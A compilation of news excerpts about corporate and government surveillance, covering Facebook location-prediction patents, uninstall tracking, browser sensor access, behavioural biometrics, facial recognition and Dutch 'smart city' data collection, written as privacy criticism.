Resources

Facebook has Filed a Patent To Calculate Your Future Location

Facebook has filed several patent applications with the U.S. Patent and Trademark Office for technology that uses your location data to predict where you’re going and when you’re going to be offline.

A May 30, 2017, Facebook application titled “Offline Trajectories” describes a method to predict where you’ll go next based on your location data. The technology described in the patent would calculate a “transition probability based at least in part on previously logged location data associated with a plurality of users who were at the current location.” In other words, the technology could also use the data of other people you know, as well as that of strangers, to make predictions. If the company could predict when you are about to be in an offline area, Facebook content “may be prefetched so that the user may have access to content during the period where there is a lack of connectivity.”

Another Facebook patent application titled “Location Prediction Using Wireless Signals on Online Social Networks” describes how tracking the strength of Wi-Fi, Bluetooth, cellular, and near-field communication (NFC) signals could be used to estimate your current location, in order to anticipate where you will go next. This “background signal” information is used as an alternative to GPS because, as the patent describes, it may provide “the advantage of more accurately or precisely determining a geographic location of a user.” The technology could learn the category of your current location (e.g., bar or gym), the time of your visit to the location, the hours that entity is open, and the popular hours of the entity.

Yet another Facebook patent application, “Predicting Locations and Movements of Users Based on Historical Locations for Users of an Online System,” further details how location data from multiple people would be used to glean location and movement trends and to model location chains. According to the patent application, these could be used for a “variety of applications,” including “advertising to users based on locations and for providing insights into the movements of users.” The technology could even differentiate movement trends among people who live in a city and who are just visiting a city.

631

Dutch Government Report Says Microsoft Office Telemetry Collection Breaks EU GDPR Laws

Microsoft broke Euro privacy rules by carrying out the “large scale and covert” gathering of private data through its Office apps, according to a report commissioned by the Dutch government.

It was found that Microsoft was collecting telemetry and other content from its Office applications, including email titles and sentences where translation or spellchecker was used, and secretly storing the data on systems in the United States.

Those actions break Europe’s new GDPR privacy safeguards, it is claimed, and may put Microsoft on the hook for potentially tens of millions of dollars in fines. The Dutch authorities are working with the corporation to fix the situation, and are using the threat of a fine as a stick to make it happen.

The investigation was jumpstarted by the fact that Microsoft doesn’t publicly reveal what information it gathers on users and doesn’t provide an option for turning off diagnostic and telemetry data sent by its Office software to the company as a way of monitoring how well it is functioning and identifying any software issues.

738

With 5G, you won’t just be watching video. It’ll be watching you, too

What happens when movies can direct themselves? Remember the last time you felt terrified during a horror movie? Take that moment, and all the suspense leading up to it, and imagine it individually calibrated for you. It’s a terror plot morphing in real time, adjusting the story to your level of attention to lull you into a comfort zone before unleashing a personally timed jumpscare.

Or maybe being scared witless isn’t your idea of fun. Think of a rom-com that stops from going off the rails when it sees you rolling your eyes. Or maybe it tweaks the eye color of that character finally finding true love so it’s closer to your own, a personalized subtlety to make the love-struck protagonist more relatable.

You can thank (or curse) 5G for that.

When most people think of 5G, they’re envisioning an ultra-fast, high-bandwidth connection that lets you download seasons of your favorite shows in minutes. But 5G’s possibilities go way beyond that, potentially reinventing how we watch video, and opening up a mess of privacy uncertainties.

“Right now you make a video much the same way you did for TV,” Dan Garraway, co-founder of interactive video company Wirewax, said in an interview this month. “The dramatic thing is when you turn video into a two-way conversation. Your audience is touching and interacting inside the experience and making things happen as a result.” The personalized horror flick or tailored rom-com? They would hinge on interactive video layers that use emotional analysis based on your phone’s front-facing camera to adjust what you’re watching in real time. You may think it’s far-fetched, but one of key traits of 5G is an ultra-responsive connection with virtually no lag, meaning the network and systems would be fast enough to react to your physical responses.

Before you cast a skeptical eye at 5G, consider how the last explosion of mobile connectivity, from 3G to 4G LTE, changed how we consumed video. Being able to watch — and in YouTube’s case, upload — video on a mobile device reimagined how we watch TV and the types of programming that are big business. A decade ago, when Netflix was about two years into its transition to streaming from DVD mailings, its annual revenue $1.4 billion. This year it’s on track for more than 10 times that ($15.806 billion).

5G’s mobility can bring video experiences to new locations. Spare gives the example straight out of Minority Report, of entering a Gap retail store and being greeted by name. But taken further, the store could develop a three-dimensional video concierge for your phone — a pseudo-hologram that helps you find what you’re looking for. With 5G’s ability to make virtual and augmented reality more accessible, you could get a snapshot of what an outfit might look like on you without having to try it on.

Where things get crazy — and creepy — is imagining how 5G enables video to react to your involuntary cues and all the data you unconsciously provide. A show could mimic the weather or time of day to more closely match the atmosphere in real life.

For all the eye-popping possibilities, 5G unleashes a tangle of privacy questions. 5G could leverage every piece of visual information a phone can see on cameras front and back in real time. This level of visual imagery collection could pave the way for video interaction to happen completely automatically.

It’s also a potential privacy nightmare. But the lure of billions of dollars have already encouraged companies to make privacy compromises.

And that may make it feel like your personalized horror show is already here.

682

Now Apps Can Track You Even After You Uninstall Them

If it seems as though the app you deleted last week is suddenly popping up everywhere, it may not be mere coincidence. Companies that cater to app makers have found ways to game both iOS and Android, enabling them to figure out which users have uninstalled a given piece of software lately—and making it easy to pelt the departed with ads aimed at winning them back.

Adjust, AppsFlyer, MoEngage, Localytics, and CleverTap are among the companies that offer uninstall trackers, usually as part of a broader set of developer tools. Their customers include T-Mobile US, Spotify Technology, and Yelp. (And Bloomberg Businessweek parent Bloomberg LP, which uses Localytics.) Critics say they’re a fresh reason to reassess online privacy rights and limit what companies can do with user data.

Uninstall tracking exploits a core element of Apple Inc.’s and Google’s mobile operating systems: push notifications. Developers have always been able to use so-called silent push notifications to ping installed apps at regular intervals without alerting the user—to refresh an inbox or social media feed while the app is running in the background, for example. But if the app doesn’t ping the developer back, the app is logged as uninstalled, and the uninstall tracking tools add those changes to the file associated with the given mobile device’s unique advertising ID, details that make it easy to identify just who’s holding the phone and advertise the app to them wherever they go.

At its best, uninstall tracking can be used to fix bugs or otherwise refine apps without having to bother users with surveys or more intrusive tools. But the ability to abuse the system beyond its original intent exemplifies the bind that accompanies the modern internet, says Gillula. To participate, users must typically agree to share their data freely, probably forever, not knowing exactly how it may be used down the road. “As an app developer, I would expect to be able to know how many people have uninstalled an app,” he says. “I would not say that, as an app developer, you have a right to know exactly who installed and uninstalled your app.”

649

Facebook Could Use Data Collected From Its Portal In-Home Video Device To Target You With Ads

Facebook announced Portal last week, its take on the in-home, voice-activated speaker to rival competitors from Amazon, Google and Apple. Last Monday, we wrote: “No data collected through Portal — even call log data or app usage data, like the fact that you listened to Spotify — will be used to target users with ads on Facebook.” We wrote that because that’s what we were told by Facebook executives. But Facebook has since reached out to change its answer: Portal doesn’t have ads, but data about who you call and data about which apps you use on Portal can be used to target you with ads on other Facebook-owned properties.

“Portal voice calling is built on the Messenger infrastructure, so when you make a video call on Portal, we collect the same types of information (i.e. usage data such as length of calls, frequency of calls) that we collect on other Messenger-enabled devices. We may use this information to inform the ads we show you across our platforms. Other general usage data, such as aggregate usage of apps, etc., may also feed into the information that we use to serve ads,” a spokesperson said in an email to Recode. That isn’t very surprising, considering Facebook’s business model. The biggest benefit of Facebook owning a device in your home is that it provides the company with another data stream for its ad-targeting business.

666

Mobile Websites Can Tap Into Your Phone’s Sensors Without Asking

When apps wants to access data from your smartphone’s motion or light sensors, they often make that capability clear. That keeps a fitness app, say, from counting your steps without your knowledge. But a team of researchers has discovered that the rules don’t apply to websites loaded in mobile browsers, which can often often access an array of device sensors without any notifications or permissions whatsoever.

That mobile browsers offer developers access to sensors isn’t necessarily problematic on its own. It’s what helps those services automatically adjust their layout, for example, when you switch your phone’s orientation. And the World Wide Web Consortium standards body has codified how web applications can access sensor data. But the researchers—Anupam Das of North Carolina State University, Gunes Acar of Princeton University, Nikita Borisov of the University of Illinois at Urbana-Champaign, and Amogh Pradeep of Northeastern University—found that the standards allow for unfettered access to certain sensors. And sites are using it.

The researchers found that of the top 100,000 sites—as ranked by Amazon-owned analytics company Alexa—3,695 incorporate scripts that tap into one or more of these accessible mobile sensors. That includes plenty of big names, including Wayfair, Priceline.com, and Kayak.

“If you use Google Maps in a mobile browser you’ll get a little popup that says, ‘This website wants to see your location,’ and you can authorize that,” says Borisov. “But with motion, lighting, and proximity sensors there isn’t any mechanism to notify the user and ask for permission, so they’re being accessed and that is invisible to the user. For this collection of sensors there isn’t a permissions infrastructure.”

That unapproved access to motion, orientation, proximity, or light sensor data alone probably wouldn’t compromise a user’s identity or device. And a web page can only access sensors as long as a user is actively browsing the page, not in the background. But the researchers note that on a malicious website, the information could fuel various types of attacks, like using ambient light data to make inferences about a user’s browsing, or using motion sensor data as a sort of keylogger to deduce things like PIN numbers.

In past work, researchers have also shown that they can use the unique calibration features of motion sensors on individual devices to identify and track them across websites. And while the World Wide Web Consortium standards classify data from these sensors as “not sensitive enough to warrant specific sensor permission grants,” the group does acknowledge that there are some potential privacy concerns. “Implementations may consider permissions or visual indicators to signify the use of sensors by the page,” the standard suggests.

The prevalence of ad networks also makes it difficult to get a handle on the issue. The researchers even found three scripts attempting to access user sensors in ad modules on WIRED.com, though at least one had been removed when the researchers rechecked the site for this story. Other media sites, including CNN, the Los Angeles Times, and CNET have ad networks using similar scripts as well.

619

Using Wi-Fi To Count People Through Walls

Whether you’re trying to figure out how many students are attending your lectures or how many evil aliens have taken your Space Force brethren hostage, Wi-Fi can now be used to count them all. The system, created by researchers at UC Santa Barbara, uses a single Wi-Fi router outside of the room to measure attenuation and signal drops. From the release: “The transmitter sends a wireless signal whose received signal strength (RSSI) is measured by the receiver. Using only such received signal power measurements, the receiver estimates how many people are inside the room — an estimate that closely matches the actual number. It is noteworthy that the researchers do not do any prior measurements or calibration in the area of interest; their approach has only a very short calibration phase that need not be done in the same area.” This means that you could simply walk up to a wall and press a button to count, with a high degree of accuracy, how many people are walking around. The system can measure up to 20 people in its current form.

589

Banks and Retailers Are Tracking How You Type, Swipe and Tap

When you’re browsing a website and the mouse cursor disappears, it might be a computer glitch — or it might be a deliberate test to find out who you are.

The way you press, scroll and type on a phone screen or keyboard can be as unique as your fingerprints or facial features. To fight fraud, a growing number of banks and merchants are tracking visitors’ physical movements as they use websites and apps.

The data collection is invisible to those being watched. Using sensors in your phone or code on websites, companies can gather thousands of data points, known as “behavioral biometrics.”
 


A phone’s touchscreen sensors can track where and how you swipe your device to help determine who you are.

 


The angle at which you hold your device is one of the many biometric markers that can be measured.

 

Behavioral monitoring software churns through thousands of elements to calculate a probability-based guess about whether a person is who they claim. Two major advances have fed its growing use: the availability of cheap computing power and the sophisticated array of sensors now built into most smartphones.

The system’s unobtrusiveness is part of its appeal, Mr. Hanley said. Traditional physical biometrics, like fingerprints or irises, require special scanning hardware for authentication. But behavioral traits can be captured in the background, without customers doing anything to sign up.

BioCatch occasionally tries to elicit a reaction. It can speed up the selection wheel you use to enter data like dates and times on your phone, or make your mouse cursor disappear for a fraction of a second.

“Everyone reacts a little differently to that,” said Frances Zelazny, BioCatch’s chief strategy and marketing officer. “Some people move the mouse side to side; some people move it up and down. Some bang on the keyboard.”

Because your reaction is so individual, it’s hard for a fraudulent user to fake. And because customers never know the monitoring technology is there, it doesn’t impose the kind of visible, and irritating, roadblocks that typically accompany security tests. You don’t need to press your thumb on your phone’s fingerprint reader or type in an authentication code.
 


Biometric software can also determine the pressure you tend to apply to your phone when you tap and type.

“We don’t have to sit people down in a room and get them to type under perfect laboratory conditions,” said Neil Costigan, the chief executive of BehavioSec, a Palo Alto, Calif., company that makes software used by many Nordic banks. “You just watch them, silently, while they go about their normal account activities.”

900

Google tracks you even if you tell it not to

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to. An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you’ve used privacy settings that say they will prevent it from doing so.

An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a “timeline” that maps out your daily movements. Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you “pause” a setting called Location History. Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.” That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account. The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.

646

Digital ads are starting to feel psychic

It seems like everyone these days has had a paranoiac moment where a website advertises something to you that you recently purchased or was gifted without a digital trail. According to a new website called New Organs, which collects first-hand accounts of these moments, “the feeling of being listened to is among the most common experiences, along with seeing the same ads on different websites, and being tracked via geo-location,” reports The Outline. The website was created by Tega Brain and Sam Lavigne, two Brooklyn-based artists whose work explores the intersections of technology and society…

694

How Smart TVs in Millions of US Homes Track More Than What’s on Tonight

The growing concern over online data and user privacy has been focused on tech giants like Facebook and devices like smartphones. But people’s data is also increasingly being vacuumed right out of their living rooms via their televisions, sometimes without their knowledge. From a report:

In recent years, data companies have harnessed new technology to immediately identify what people are watching on internet-connected TVs, then using that information to send targeted advertisements to other devices in their homes. Marketers, forever hungry to get their products in front of the people most likely to buy them, have eagerly embraced such practices. But the companies watching what people watch have also faced scrutiny from regulators and privacy advocates over how transparent they are being with users.

Samba TV is one of the bigger companies that track viewer information to make personalized show recommendations. The company said it collected viewing data from 13.5 million smart TVs in the United States, and it has raised $40 million in venture funding from investors including Time Warner, the cable operator Liberty Global and the billionaire Mark Cuban. Samba TV has struck deals with roughly a dozen TV brands — including Sony, Sharp, TCL and Philips — to place its software on certain sets. When people set up their TVs, a screen urges them to enable a service called Samba Interactive TV, saying it recommends shows and provides special offers “by cleverly recognizing onscreen content.” But the screen, which contains the enable button, does not detail how much information Samba TV collects to make those recommendations…. Once enabled, Samba TV can track nearly everything that appears on the TV on a second-by-second basis, essentially reading pixels to identify network shows and ads, as well as programs on Netflix and HBO and even video games played on the TV.

665

Facebook, Google, and Microsoft Use Design to Trick You Into Handing Over Your Data, New Report Warns

A study from the Norwegian Consumer Council dug into the underhanded tactics used by Microsoft, Facebook, and Google to collect user data. “The findings include privacy intrusive default settings, misleading wording, giving users an illusion of control, hiding away privacy-friendly choices, take-it-or-leave-it choices, and choice architectures where choosing the privacy friendly option requires more effort for the users,” states the report, which includes images and examples of confusing design choices and strangely worded statements involving the collection and use of personal data.

Google makes opting out of personalized ads more of a chore than it needs to be and uses multiple pages of text, unclear design language, and, as described by the report, “hidden defaults” to push users toward the company’s desired action. “If the user tried to turn the setting off, a popup window appeared explaining what happens if Ads Personalization is turned off, and asked users to reaffirm their choice,” the report explained. “There was no explanation about the possible benefits of turning off Ads Personalization, or negative sides of leaving it turned on.” Those who wish to completely avoid personalized ads must traverse multiple menus, making that “I agree” option seem like the lesser of two evils.

In Windows 10, if a user wants to opt out of “tailored experiences with diagnostic data,” they have to click a dimmed lightbulb, while the symbol for opting in is a brightly shining bulb, says the report.

Another example has to do with Facebook. The social media site makes the “Agree and continue” option much more appealing and less intimidating than the grey “Manage Data Settings” option. The report says the company-suggested option is the easiest to use. “This ‘easy road’ consisted of four clicks to get through the process, which entailed accepting personalized ads from third parties and the use of face recognition. In contrast, users who wanted to limit data collection and use had to go through 13 clicks.”

699

MIT’s AI Can Track Humans Through Walls With Just a Wifi Signal

Researchers at the Massachusetts Institute of Technology have developed a new piece of software that uses wifi signals to monitor the movements, breathing, and heartbeats of humans on the other side of walls. While the researchers say this new tech could be used in areas like remote healthcare, it could in theory be used in more dystopian applications.

“We actually are tracking 14 different joints on the body […] the head, the neck, the shoulders, the elbows, the wrists, the hips, the knees, and the feet,” Dina Katabi, an electrical engineering and computer science teacher at MIT, said. “So you can get the full stick-figure that is dynamically moving with the individuals that are obstructed from you — and that’s something new that was not possible before.” The technology works a little bit like radar, but to teach their neural network how to interpret these granular bits of human activity, the team at MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) had to create two separate A.I.s: a student and a teacher.

The team developed one A.I. program that monitored human movements with a camera, on one side of a wall, and fed that information to their wifi X-ray A.I., called RF-Pose, as it struggled to make sense of the radio waves passing through that wall on the other side. The research builds off of a longstanding project at CSAIL lead by Katabi, which hopes to use this wifi tracking to help passively monitor the elderly and automate any emergency alerts to EMTs and medical professionals if they were to fall or suffer some other injury.

Massachusetts Institute of Technology behind the innovation has previously received funding from the Pentagon’s Defense Advanced Research Projects Agency (DARPA). Another also presented work at a security research symposium curated by a c-suite member of In-Q-Tel, the CIA’s high-tech venture capital firm.

736

Google plan for data-driven ‘smart city’ sparks privacy, democracy concerns

In the Canadian city of Toronto, city officials are negotiating a project that will give a section of the city’s waterfront to the US tech giant Google. Under the arrangement, Google affiliate Sidewalk Labs will build and run a high-tech “radical mixed-use” site called Quayside. This “smart city” plan involves creating a neighbourhood “from the internet up”, powered and served by data; with sensors monitoring everything from air quality to pedestrian traffic, even the flushing of toilets. Amenities like garbage disposal and goods delivery are to be coordinated and driven by AI and robotics.

The proposed parcel of land isn’t huge, but it’s not insubstantial either – it covers about half-a-square-kilometre, and there are already suggestions it could be extended.

For Eric Schmidt, executive chairman of Alphabet — the parent company of both Google and Sidewalk Labs — it’s the culmination of a long-held ambition.

“Give us a city and put us in charge,” he once famously declared.

Following the Facebook/Cambridge Analytica scandal, some, like Dr Jathan Sadowski at the University of Sydney, worry about the implications of putting a private tech company in charge of both urban development and urban life.

“What’s in it for them? It’s data,” he says. “It allows them to get really massive amounts of granular data about urban life and urban environments.”

“You’ll have a city that’s based on, or built around, proprietary platforms, data harvesting, corporate control.”

624

Targeted advertising hits emergency rooms

Patients sitting in emergency rooms, at chiropractors’ offices and at pain clinics in the Philadelphia area may start noticing on their phones the kind of messages typically seen along highway billboards and public transit: personal injury law firms looking for business by casting mobile online ads at patients.

The potentially creepy part? They’re only getting fed the ad because somebody knows they are in an emergency room.

The technology behind the ads, known as geofencing, or placing a digital perimeter around a specific location, has been deployed by retailers for years to offer coupons and special offers to customers as they shop. Bringing it into health care spaces, however, is raising alarm among privacy experts.

681

Facebook accused of conducting mass surveillance through its apps

Facebook used its apps to gather information about users and their friends, including some who had not signed up to the social network, reading their text messages, tracking their locations and accessing photos on their phones, a court case in California alleges.

The claims of what would amount to mass surveillance are part of a lawsuit brought against the company by the former startup Six4Three, listed in legal documents filed at the superior court in San Mateo as part of a court case that has been ongoing for more than two years.

It alleges that Facebook used a range of methods, some adapted to the different phones that users carried, to collect information it could use for commercial purposes.

“Facebook continued to explore and implement ways to track users’ location, to track and read their texts, to access and record their microphones on their phones, to track and monitor their usage of competitive apps on their phones, and to track and monitor their calls,” one court document says.

But all details about the mass surveillance scheme have been redacted on Facebook’s request in Six4Three’s most recent filings. Facebook claims these are confidential business matters.

Other alleged projects included one to remotely activate Bluetooth, allowing the company to pinpoint a user’s location without them explicitly agreeing to it. Another involved the development of privacy settings with an early end date that was not flagged to users, letting them expire without notice, the court documents claim.

Facebook admitted recently that it had collected call and text message data from users, but said it only did so with prior consent. However the Guardian has reported that it logged some messages without explicitly notifying users. The company could not see text messages for iPhone users but could access any photos taken on a phone or stored on the built-in “camera roll” archive system, the court case alleged. It has not disclosed how they were analysed.

Facebook has not fully disclosed the manner in which it pre-processes photos on the iOS camera roll, meaning if a user has any Facebook app installed on their iPhone, then Facebook accesses and analyses the photos the user takes and/or stores on the iPhone, the complainant alleges.

671

New York high school will use CCTV and facial recognition to enforce discipline

Next year, high schools in Lockport New York will use the “Aegis” CCTV and facial recognition system to track and record the interactions of students suspected of code of conduct violations, keeping a ledger of who speaks to whom, where, and for how long.

The record will be used to assemble evidence against students and identify possible accomplices to ascribe guilt to.

Lockport Superintendent Michelle T. Bradley justified the decision by noting, “We always have to be on our guard. We can’t let our guard down.”

Lockport will be the first school district in the world to subject its students to this kind of surveillance. The program will cost $1.4m in state money. The technology supplier is SN Technologies of Ganonoque, Ont., one of the companies in the vicinity of Kingston, Ontario, home to the majority of the province’s detention centers.

The Lockport district says that the system will make students safer by alerting officials if someone on a sex-offender registry or terrorist watchlist enters the property. None of America’s school shootings or high-profile serial sex abuse scandals were carried out by wanted terrorists or people on the sex-offender registry.

Deployed law-enforcement facial recognition systems have failure rates of 98%. The vendor responsible for Aegis would not disclose how they improved on the state of the art, but insisted that their product worked “99.97% of the time.” The spokesperson would not disclose any of the workings of the system, seemingly believing that doing so was antithetical to security.

677

London cops are using an unregulated, 98% inaccurate facial recognition tech

The London Metropolitan Police use a facial recognition system whose alerts have a 98% false positive rate; people falsely identified by the system are stopped, questioned and treated with suspicion.

The UK has a biometrics commissioner, Professor Paul Wiles, who laments the lack of any regulation of this technology, calling it “urgently needed”; these regulations are long promised, incredibly overdue, and the Home Office admits that they’re likely to be delayed beyond their revised June publication date.

The Met say that they don’t “arrest” people who are erroneously identified by the system. Rather, they “detain” them by refusing to allow them to leave and subjecting them to searches, etc.

Incredibly, the Met’s system is even worse than the South Wales Police’s facial recognition system, which has a comparatively impressive 92% failure rate.

681

Why the Facebook ‘scandal’ impacts you more than you think

It’s not just the data you choose to share.

By now we all know the story: Facebook allowed apps on its social media platform which enabled a shady outfit called Cambridge Analytica to scrape the profiles of 87 million users, in order to serve up targeted ads to benefit the Trump election campaign in 2016.  More than 300,000 Australian users of Facebook were caught up in the data harvesting.

But serving up ads in a foreign election campaign is not the whole story.  Facebook, and other companies involved in data mining, are invading our privacy and harming us economically and socially, in ways that are only just starting to become clear.

And it’s not just the data you choose to share. The information you post is not the whole story.  It’s only the tip of the iceberg of data that Facebook has collected about you.

Every time you go online you leave a trail of digital breadcrumbs.  Facebook has been busily sweeping up those breadcrumbs, and using them to categorise and profile you.  Facebook obviously knows when you click on a Facebook ‘like’ button; but also, unless a web developer has gone out of their way to find tools to block them (as we have done for our Salinger Privacy blog), Facebook knows every time you simply look at a website that has a Facebook ‘like’ button somewhere on it.

So if you only post or ‘like’ stories about inspirational mountain climbers and funny cat videos, but also do things online that you don’t share with your family, friends or work colleagues (like looking at stories about abortion or dealing with infidelity, Googling how to manage anxiety or erectile dysfunction, whingeing about your employer in a chatroom, or spending hours reviewing dating profiles, gambling or shopping obsessively for shoes)  — Facebook has you pegged anyway.

Plus, Facebook obtains data from other sources which know about your offline purchases, to build an even richer picture of who you really are.  And of course, Facebook may have access to your address book, your location history, the contents of your private messages, and depending on your brand of phone, possibly even a history of your phone calls and text messages.

All that information is used to draw inferences and assumptions about your preferences, and predict your likely behaviour.  The results are then used to categorise, profile and ultimately target you, in a process usually described as ‘online behavioural advertising’.

It’s not ‘just ads’

The objective of online behavioural advertising is to predict your purchasing interests and drive a purchase decision.  So far, the same as any other advertising.  But online, the implications for us as individuals are much greater.

Facebook’s promise to advertisers is that it can show their ad to exactly who the advertiser wants, and exclude everybody else.

However, by allowing exclusion, the platform also allows discrimination.  Facebook has been caught allowing advertisers to target — and exclude — people on the basis of their ‘ethnic affinity’, amongst other social, demographic, racial and religious characteristics.  So a landlord with an ad for rental housing could prevent people profiled as ‘single mothers’ from ever seeing their ad.  An employer could prevent people identifying as Jewish from seeing a job ad.  A bank could prevent people categorised as African Americans from seeing an ad for a home loan.

Existing patterns of social exclusion, economic inequality and discrimination are further entrenched by micro-targeted advertising, which is hidden from public view and regulatory scrutiny.

Data boy. Mark Zuckerberg testifies in Washington. Image: Getty.

Predictive analytics can narrow or alter your life choices

Once we move beyond straight-up advertising and into predictive analytics, the impact on individual autonomy becomes more acute.  Big Data feeds machine learning, which finds patterns in the data, from which new rules (algorithms) are designed.  Algorithms predict how a person will behave, and suggest how they should be treated.

Algorithms can lead to price discrimination, like surge pricing based on Uber knowing how much phone battery life you have left.  Or market exclusion, like Woolworths only offering car insurance to customers it has decided are low risk, based on an assessment of the groceries they buy.

Banks have been predicting the risk of a borrower defaulting on a loan for decades, but now algorithms are also used to determine who to hire, predict when a customer is pregnant, and deliver targeted search results to influence how you vote.

Algorithms are also being used to predict the students at risk of failure, the prisoners at risk of re-offending, and who is at risk of suicide and then launching interventions accordingly.  However, even leaving aside the accuracy of those predictions, interventions are not necessarily well-intentioned.  It was revealed last year that Australian Facebook executives were touting to advertisers their ability to target psychologically vulnerable teenagers. 

Automated decision-making diminishes our autonomy, by narrowing or altering our market and life choices, in ways that are not clear to us.  People already in a position of economic or social disadvantage face the additional challenge of trying to disprove or beat an invisible algorithm.

In a predictive and pre-emptive world, empathy, forgiveness, rehabilitation, redemption, individual dignity, autonomy and free will are programmed out of our society.

Fiddling with users’ privacy settings on Facebook won’t fix anything.  If we want our lives to be ruled by human values and individual dignity, instead of by machines fed on questionable data, we need robust, enforced and globally effective privacy laws.

A new European privacy law commences later this month.  The obligations include that businesses and governments must offer understandable explanations of how their algorithms work, and allow people to seek human review of automated decision-making.  This is a step in the right direction, which Australia, the US and the rest of the world should follow.

828

‘Living laboratories’: the Dutch cities amassing data on oblivious residents

Stratumseind in Eindhoven is one of the busiest nightlife streets in the Netherlands. On a Saturday night, bars are packed, music blares through the street, laughter and drunken shouting bounces off the walls. As the night progresses, the ground becomes littered with empty shot bottles, energy drink cans, cigarette butts and broken glass.

It’s no surprise that the place is also known for its frequent fights. To change that image, Stratumseind has become one of the “smartest” streets in the Netherlands. Lamp-posts have been fitted with wifi-trackers, cameras and 64 microphones that can detect aggressive behaviour and alert police officers to altercations. There has been a failed experiment to change light intensity to alter the mood. The next plan, starting this spring, is to diffuse the smell of oranges to calm people down. The aim? To make Stratumseind a safer place.

We get that comment a lot – ‘Big brother is watching you’. I prefer to say, ‘Big brother is helping you’

All the while, data is being collected and stored. “Visitors do not realise they are entering a living laboratory,” says Maša Galic, a researcher on privacy in the public space for the Tilburg Institute of Law, Technology and Society. Since the data on Stratumseind is used to profile, nudge or actively target people, this “smart city” experiment is subject to privacy law. According to the Dutch Personal Data Protection Act, people should be notified in advance of data collection and the purpose should be specified – but in Stratumseind, as in many other “smart cities”, this is not the case.

Peter van de Crommert is involved at Stratumseind as project manager with the Dutch Institute for Technology, Safety and Security. He says visitors do not have to worry about their privacy: the data is about crowds, not individuals. “We often get that comment – ‘Big brother is watching you’ – but I prefer to say, ‘Big brother is helping you’. We want safe nightlife, but not a soldier on every street corner.”

When we think of smart cities, we usually think of big projects: Songdo in South Korea, the IBM control centre in Rio de Janeiro or the hundreds of new smart cities in India. More recent developments include Toronto, where Google will build an entirely new smart neighbourhood, and Arizona, where Bill Gates plans to build his own smart city. But the reality of the smart city is that it has stretched into the everyday fabric of urban life – particularly so in the Netherlands.

In the eastern city of Enschede, city traffic sensors pick up your phone’s wifi signal even if you are not connected to the wifi network. The trackers register your MAC address, the unique network card number in a smartphone. The city council wants to know how often people visit Enschede, and what their routes and preferred spots are. Dave Borghuis, an Enschede resident, was not impressed and filed an official complaint. “I don’t think it’s okay for the municipality to track its citizens in this way,” he said. “If you walk around the city, you have to be able to imagine yourself unwatched.”

Enschede is enthusiastic about the advantages of the smart city. The municipality says it is saving €36m in infrastructure investments by launching a smart traffic app that rewards people for good behaviour like cycling, walking and using public transport. (Ironically, one of the rewards is a free day of private parking.) Only those who mine the small print will discover that the app creates “personal mobility profiles”, and that the collected personal data belongs to the company Mobidot.
‘Targeted supervision’ in Utrecht

Companies are getting away with it in part because it involves new applications of data. In Silicon Valley, they call it “permissionless innovation”, they believe technological progress should not be stifled by public regulations. For the same reason, they can be secretive about what data is collected in a public space and what it is used for. Often the cities themselves don’t know.

Utrecht keeps track of the number of boys and girls hanging in the streets, their age and whether they are acquaintances

Utrecht has become a tangle of individual pilots and projects, with no central overview of how many cameras and sensors exist, nor what they do. In 2014, the city invested €80m in data-driven management that launched in 80 projects. Utrecht now has a burglary predictor, a social media monitoring room, and smart bins and smart streetlights with sensors (although the city couldn’t say where these are located). It has scanner cars that dispense parking tickets, with an added bonus of detecting residents with a municipal tax debt according to the privacy regulation of the scanner cars. But when I asked the city to respond to a series of questions on just 22 of the smart projects, it could only answer for five of them, referring me to private companies for the rest of the answers.

The city also keeps track of the number of young people hanging out in the streets, their age group, whether they know each other, the atmosphere and whether or not they cause a nuisance. Special enforcement officers keep track of this information through mobile devices. It calls this process “targeted and innovative supervision”. Other council documents mention the prediction of school drop-outs, the prediction of poverty and the monitoring of “the health of certain groups” with the aim of “intervening faster”.

Like many cities, Utrecht argues that it acts in accordance with privacy laws because it anonymises or pseudonymises data (assigning it a number instead of a name or address). But pseudonymised personal data is still personal data. “The process is not irreversible if the source file is stored,” says Mireille Hildebrandt, professor of ICT and Law at Radboud University. “Moreover, if you build personal profiles and act on them, it is still a violation of privacy and such profiling can – unintentionally – lead to discrimination.” She points to Utrecht’s plan to register the race and health data of prostitutes, which came in for heavy criticism from the Dutch Data Protection Authority.

Another unanswered question regards who owns data that is collected in a public space. Arjen Hof is director of Civity, a company that builds data platforms for governments. “Public authorities are increasingly outsourcing tasks to private companies. Think of waste removal or street lighting,” he says. “But they do not realise that at the same time a lot of data is collected, and do not always make agreements about the ownership of data.”
‘A smart city is a privatised city’

Hof gives the example of CityTec, a company that manages 2,000 car parks, 30,000 traffic lights and 500,000 lamp-posts across the Netherlands. It refused to share with municipalities the data it was collecting through its lamp-post sensors. “Their argument was that, although the municipality is legally owner of the lamp-posts, CityTec is the economic owner and, for competitive reasons, did not want to make the data available,” Hof says. This was three years ago, but for a lot of companies it remains standard practice. Companies dictate the terms, and cities say they can’t share the contracts because it contains “competition-sensitive information”.

When I interviewed the technology writer Evgeny Morozov in October, he warned of cities becoming too dependent on private companies. “The culmination of the smart city is a privatised city,” he said. “A city in which you have to pay for previously free services.”

Morozov’s fear about public subsidies being used for private innovation is well illustrated in Assen, a city of 70,000 people in the north of the country. Assen built a fibre-optic network for super-fast internet in 2011, to which it connected 200 sensors that measure, among other things, the flow of cars. There was an experiment to steer people around traffic jams, even though traffic in the city is relatively light. The city also connected its traffic lights, parking garages and parking signs to this grid. The cost of €46m was split between Brussels, the national government, the province and the municipality. Companies such as the car navigation firm TomTom have used the sensor network to test new services.

The project, called Sensor City, filed for bankruptcy a year ago. Now the publicly funded fibre-optic network, sensors and all, will be sold to a still-unidentified private company. The municipality will have to strike a deal with the new owner about the use of its public traffic lights and parking signs.

774